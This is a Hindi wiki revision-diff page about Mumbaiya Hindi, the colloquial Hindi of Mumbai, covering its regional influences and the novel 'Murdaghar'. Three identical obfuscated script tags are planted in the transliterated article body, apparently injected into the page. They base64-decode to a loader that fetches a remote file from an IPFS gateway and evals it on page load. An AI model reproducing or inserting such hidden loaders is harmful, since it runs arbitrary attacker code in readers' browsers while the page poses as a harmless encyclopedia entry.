Difference between revisions of "मुम्बईया हिन्दी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*मुम्बईया हिन्दी मुम्बई में बोली जाती है। *इसका मू...' के साथ नया पन्ना बनाया)
 
 
(2 intermediate revisions by one other user not shown)
Line 3: Line 3:
 
*मुम्बईया हिन्दी किसी की मातृभाषा नहीं है।  
 
*मुम्बईया हिन्दी किसी की मातृभाषा नहीं है।  
 
*यह मात्र सामान्य बोलचाल में प्रयुक्त होती है, लेखन या औपचारिक स्थितियों में नहीं।  
 
*यह मात्र सामान्य बोलचाल में प्रयुक्त होती है, लेखन या औपचारिक स्थितियों में नहीं।  
*यों अब फिल्मी हिन्दी में इसके प्रयोग अवश्य कभी- कभी मिल जाते हैं।*उसी प्रभाव से मुम्बई के लेखकों के कथा- साहित्य में भी से कहीं- कहीं पाया जा सकता है।  
+
*यों अब फ़िल्मी हिन्दी में इसके प्रयोग अवश्य कभी- कभी मिल जाते हैं।
 +
*उसी प्रभाव से मुम्बई के लेखकों के कथा- साहित्य में भी से कहीं- कहीं पाया जा सकता है।  
 
*[[जगदम्बा प्रसाद दीक्षित]] का उपन्यास 'मुर्दाघर' तो मुख्यत: प्राय: इसी हिन्दी में लिखा गया है।{{प्रचार}}
 
*[[जगदम्बा प्रसाद दीक्षित]] का उपन्यास 'मुर्दाघर' तो मुख्यत: प्राय: इसी हिन्दी में लिखा गया है।{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
Line 16: Line 17:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भाषा और लिपि}}
 
{{भाषा और लिपि}}
[[Category:भाषा_और_लिपि]]
+
[[Category:भाषा और लिपि]][[Category:भाषा कोश]]
 
[[Category:साहित्य_कोश]]
 
[[Category:साहित्य_कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:19, 9 October 2013

  • mumbeeya hindi mumbee mean boli jati hai.
  • isaka mool adhar to manak hindi hai kiantu is par marathi aur gujarati tatha rajasthani, avadhi, bhojapuri adi hindi boliyoan ka prabhav p da hai.
  • mumbeeya hindi kisi ki matribhasha nahian hai.
  • yah matr samany bolachal mean prayukt hoti hai, lekhan ya aupacharik sthitiyoan mean nahian.
  • yoan ab filmi hindi mean isake prayog avashy kabhi- kabhi mil jate haian.
  • usi prabhav se mumbee ke lekhakoan ke katha- sahity mean bhi se kahian- kahian paya ja sakata hai.
  • jagadamba prasad dikshit ka upanyas 'murdaghar' to mukhyat: pray: isi hindi mean likha gaya hai.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>